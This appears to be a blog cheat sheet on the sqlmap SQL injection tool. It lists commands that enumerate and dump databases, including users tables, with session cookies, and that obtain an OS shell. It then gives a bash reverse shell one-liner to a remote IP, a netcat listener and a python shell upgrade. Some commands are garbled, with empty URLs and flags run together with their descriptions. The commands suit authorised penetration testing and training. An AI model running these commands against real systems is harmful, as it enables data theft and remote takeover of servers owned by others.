Guide to sqlmap tool – sql injection

Install sqlmap using apt

sudo apt install sqlmap

Examples commands

sqlmap -u ‘’ –cookie=”PHPSESSID=rcegk9j75j30330937a1srgll1″ test “search” parameter for vulnerabilities
sqlmap -u ‘’ –cookie=”PHPSESSID=rcegk9j75j30330937a1srgll1″ –os-shelltry to perform command injection
sqlmap -u “” –method POST –data “username=FUZZ&password=FUZZ” –batch –dbsGet a list of databases
sqlmap -u “” –method POST –data “username=FUZZ&password=FUZZ” –tables -D DATABASENAME get a list of tables for database name
sqlmap -u “” –method POST –data “username=FUZZ&password=FUZZ” -D DATABASENAME -batch –dump -T users –force-pivoting Get the contents of users table
sqlmap -r req –batch –dumpautomatically dump all data.
sqlmap -u –cookie=”id=1*” –batch –dumpdump all data +use user auth cookies
sqlmap -u “” –banner –current-user –current-db –is-dbaBasic DB Data Enumeration
sqlmap -u “” –tables -D exampleDB retrieval of table names
sqlmap -u “” –dump -T users -D exampleDBDump table content
sqlmap -u “” –dump -T users -D exampleDB -C name,surname –start=2 –stop=3for large tables specify the columns
sqlmap -u “″ –dump -T users -D exampleDB –where=”name LIKE ‘f%'”Conditional Enumeration


skip the retrieval of content from system databases

--dump-all --exclude-sysdbs 
--dump-all --exclude-sysdbs 

To make shell connection much more stable, you can use the flowing payload

bash -c "bash -i >& /dev/tcp/{your remote IP address}/1234 0>&1"

open listener port 1234 on your remote machine using netcat

sudo nc -lvnp 1234

after you get foothold make your shell fully interactive

python3 -c 'import pty; pty.spawn("/bin/bash")'


Like this article?

You may also enjoy these articles

SearchSploit: Guide to Exploit Database Search

Searchsploit is a command-line tool that allows users to search the Exploit Database, which is a repository of publicly disclosed vulnerabilities and exploitation techniques. It

fuzzing with ffuf tool

Guide to FFUF tool – Web Application Fuzzing

FFUF is a powerful and flexible open-source tool for performing web application fuzzing. Whether you’re a security professional looking to identify vulnerabilities or a developer


Hydra tool make password cracking to easy task, hydra can brute Force multiple protocols and services like ftp irc ldap2[s] ldap3 mongodb mssql mysql

Scroll to Top